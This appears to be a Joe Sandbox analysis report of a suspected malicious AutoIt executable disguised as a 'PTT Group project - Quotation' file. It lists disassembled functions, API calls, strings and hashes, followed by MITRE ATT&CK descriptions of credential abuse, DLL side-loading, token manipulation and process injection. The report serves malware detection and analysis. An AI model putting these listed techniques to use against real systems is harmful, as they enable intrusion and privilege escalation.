Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: d5b76554d09ae873b015cdda7c36c0cfa128afff4802b39dd98ffa535658fc97
Instruction ID: 6a46fdd303f30d96a818907062bb08a76fe0ca80c7cbf372497eab88c2479676
Opcode Fuzzy Hash: d5b76554d09ae873b015cdda7c36c0cfa128afff4802b39dd98ffa535658fc97
Instruction Fuzzy Hash: B8311C71900119AFCF11EFA5CC85EEEBFB9FF48310F104069F815A6266DB315A96DBA0

Function 00996CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00996D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00996DC2

Strings

static, xrefs: 00996D22

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 6dd3f09e9acf31b5aaae600f3f87f6d13e6acf3ca091ab7d534708f3b57e7cef
Instruction ID: c7c2310d0a440fc61ae496e16963985485ed6b5e0343215634173744224aae10
Opcode Fuzzy Hash: 6dd3f09e9acf31b5aaae600f3f87f6d13e6acf3ca091ab7d534708f3b57e7cef
Instruction Fuzzy Hash: 42317E71210608AAEF109F68DC90BFB77BDFF88724F108619F9A5D7190DA35AC91DB60

Function 00972D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00972E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00972E3B

Strings

0, xrefs: 00972DF9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 6cd74eb5fdf59b6ce173a0d482988eab88d48d98025d73dce3831b8d03ff8c39
Instruction ID: 5a4d9f98ecb88bab8a971dcd7052518c52d2eee7ad81d123640ba37079f6ecee
Opcode Fuzzy Hash: 6cd74eb5fdf59b6ce173a0d482988eab88d48d98025d73dce3831b8d03ff8c39
Instruction Fuzzy Hash: 1231D532614305EBEB248F58D845BAEBBBDFF45350F14842AE9C9961A0D7709940DB51

Function 00996943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009969D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009969DB

Strings

Combobox, xrefs: 0099699D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 3899ef33f7f72233bccf91f7f99bf81c2532c403eda5c1b0acc84914ca69c4ca
Instruction ID: 87f5ee64ad151ebfe2f62895e0e1b280b9e28046e2a5618f981a3fac6b189cd1
Opcode Fuzzy Hash: 3899ef33f7f72233bccf91f7f99bf81c2532c403eda5c1b0acc84914ca69c4ca
Instruction Fuzzy Hash: 8811BF717102086FEF119E2CCC90FEB376EEB893A4F110129F9589B290D6759C9187A0

Function 00996E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00911D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00911D73
Part of subcall function 00911D35: GetStockObject.GDI32(00000011), ref: 00911D87
Part of subcall function 00911D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00911D91

GetWindowRect.USER32(00000000,?), ref: 00996EE0
GetSysColor.USER32(00000012), ref: 00996EFA

Strings

static, xrefs: 00996EBD

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: d0989efd99bc24902e70b148b851ff1bb4500812dd46df4e5df23ff8782338ed
Instruction ID: 0ff249db201d65b36c1932ab3d24b566f0a47b9e9fd1f198fcfe995db3ac26bb
Opcode Fuzzy Hash: d0989efd99bc24902e70b148b851ff1bb4500812dd46df4e5df23ff8782338ed
Instruction Fuzzy Hash: 22215972620209AFDF04DFA8DD45AFA7BB8FB48314F014629F955D3250D634E8619B50

Function 00996B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00996C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00996C20

Strings

edit, xrefs: 00996BF5

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: e1c6e9b794633aa59526c8e06b37fe0b3e25de10d834d8509afdc537b2582e8b
Instruction ID: a6facf38a14c9a1a04c1b198d5e58bd6316994e783d493231a1b77d7545896ea
Opcode Fuzzy Hash: e1c6e9b794633aa59526c8e06b37fe0b3e25de10d834d8509afdc537b2582e8b
Instruction Fuzzy Hash: 4D119A71119208ABEF108E689C51AFA376DEB54368F204724FAA0D31E0E635DC90AB60

Function 00972E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00972F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00972F30

Strings

0, xrefs: 00972F07

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d802c4635ca69a922f58312a15d5f7a3a3d403e5227123c1ef30481c7edce6f0
Instruction ID: a9d4d46bce1664d0710d79f7067a51b4186548be73e42291b86f667e51ad57db
Opcode Fuzzy Hash: d802c4635ca69a922f58312a15d5f7a3a3d403e5227123c1ef30481c7edce6f0
Instruction Fuzzy Hash: C111BF33925214ABDB24DF59DC44BA977BDEB05310F1880A6E958A72A0D7B0AE04D791

Function 009824CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00982520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00982549

Strings

<local>, xrefs: 00982511

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 50584ccca64037bb2b28342d4ad21592905357223de1e5d498c2d35f25560182
Instruction ID: 6c44597a4514db583addf880400903c1a514908890a2a872f267ae45a8ba32e4
Opcode Fuzzy Hash: 50584ccca64037bb2b28342d4ad21592905357223de1e5d498c2d35f25560182
Instruction Fuzzy Hash: F011C2B0541225BADB24AF618CA9EBBFF6CFF06765F10812AF90586240D2746951DBF0

Function 009880A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0098830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009880C8,?,00000000,?,?), ref: 00988322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009880CB
htons.WSOCK32(00000000,?,00000000), ref: 00988108

Strings

255.255.255.255, xrefs: 009880E3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: a961c287fa15a16e27d3f764affa1a575c3e9301575fce04d0aa7538b754ec63
Instruction ID: 37418d97335b0abbaafa2ec2721d1f2f9f3bd64c3320c4703ac65884f71274db
Opcode Fuzzy Hash: a961c287fa15a16e27d3f764affa1a575c3e9301575fce04d0aa7538b754ec63
Instruction Fuzzy Hash: B4118235604209ABDB20AFA4CC56FFEB364EF54320F508517E91197391DE71A81587A5

Function 009692E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 0096B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0096B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00969355

Strings

ListBox, xrefs: 0096931F
ComboBox, xrefs: 009692F4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d7dd39d897416500a1402bee957b35ca2eecc86c185f4b4df0bce79c1ef301c5
Instruction ID: 0c649972a069fb30bec362739da11097b7c30575900370e5cb8771b83c62c767
Opcode Fuzzy Hash: d7dd39d897416500a1402bee957b35ca2eecc86c185f4b4df0bce79c1ef301c5
Instruction Fuzzy Hash: B901D471B45219ABCB08EBA4CC91EFEB76DFF86320B140A19F832973D1EB31594C9650

Function 009691DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 0096B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0096B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0096924D

Strings

ListBox, xrefs: 00969217
ComboBox, xrefs: 009691EC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 01173bc89f5f72681ca9ed1e9e22dd2210aed56fd4b7d9f9ca41caf941a272ee
Instruction ID: c916324d4417d30787cf377835022652adcf42c0eeb6523047d2873314b75110
Opcode Fuzzy Hash: 01173bc89f5f72681ca9ed1e9e22dd2210aed56fd4b7d9f9ca41caf941a272ee
Instruction Fuzzy Hash: 56018471B41209BBCB05EBA0C9A6FFFB7AC9F85300F150019B91267281EA255E489671

Function 00969264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 0096B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0096B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 009692D0

Strings

ListBox, xrefs: 0096929C
ComboBox, xrefs: 00969271

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 21dc56830e066bf66361ce79ae48a872b164f028a0abce00d6a4defc8cacd5b2
Instruction ID: 962e7bdc7eaa03dd17c94ab14adacfd86c33f65eddfd7d4d703a95e1dcd89e64
Opcode Fuzzy Hash: 21dc56830e066bf66361ce79ae48a872b164f028a0abce00d6a4defc8cacd5b2
Instruction Fuzzy Hash: 1501A271B81209BBCB05EBA4C992FFFB7AC9F51300F250119B812A3282DA355E4C9672

Function 009751CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009751E8
_wcscmp.LIBCMT ref: 009751FA

Strings

#32770, xrefs: 009751F4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 0028f0e930f615914de448fa895d75091329e0f527733ddea4193019603c16ec
Instruction ID: 856186882bd3e234fb80a1aea3a19757936c4ed2986f9e19c66492fcd83e3775
Opcode Fuzzy Hash: 0028f0e930f615914de448fa895d75091329e0f527733ddea4193019603c16ec
Instruction Fuzzy Hash: ABE06833A0422C2BE3209AD9AC0AFA7F7ECEB84771F00016BFD24D3040E5609A448BE1

Function 009681BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009681CA

Part of subcall function 00933598: _doexit.LIBCMT ref: 009335A2

Strings

Error allocating memory., xrefs: 009681C3
AutoIt, xrefs: 009681BE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 58aff96e17ec9d19fd88ac4f9e73ac2b173d531b3c85bce3e2a6b4495f80cacf
Instruction ID: 1ddbb09977bba07a84bbc022220b403c1cc403d5b24d2aa7f1910de8b29fea5c
Opcode Fuzzy Hash: 58aff96e17ec9d19fd88ac4f9e73ac2b173d531b3c85bce3e2a6b4495f80cacf
Instruction Fuzzy Hash: B8D05B323C931C32D21433A96C0BFC675888B49B56F044026BB08955D38DD155D142D9

Function 0094B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0094B564: _memset.LIBCMT ref: 0094B571

Part of subcall function 00930B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0094B540,?,?,?,0091100A), ref: 00930B89

IsDebuggerPresent.KERNEL32(?,?,?,0091100A), ref: 0094B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0091100A), ref: 0094B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0094B54E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: e1d7c4dc7167d8def4fd9a8fd4237f6545d287b13207b9018aff1eecdab334d8
Instruction ID: 63ec62580f2634690cd037370c7bbdb84cb3b5bf995221f184fa458d54d894f7
Opcode Fuzzy Hash: e1d7c4dc7167d8def4fd9a8fd4237f6545d287b13207b9018aff1eecdab334d8
Instruction Fuzzy Hash: 7CE06D702143118BD720DF69D504786BBE4AB44794F00892DF456C2650D7B4D444CB61

Function 00995BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00995BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00995C08

Part of subcall function 009754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0097555E

Strings

Shell_TrayWnd, xrefs: 00995BEE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c870c1b29868d78f0aef39d56174cfaa296d146eaab8f9b1c3e2541f1da5d8ff
Instruction ID: cc6caf460278fcbe41316fd12321665bb30133bbbec21b664a27c1af4dd8d8b6
Opcode Fuzzy Hash: c870c1b29868d78f0aef39d56174cfaa296d146eaab8f9b1c3e2541f1da5d8ff
Instruction Fuzzy Hash: 2ED0223239C300B7E374BB30AC1FFE3AA10AB40B01F01083AB309EA0E0C8E05800C300

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

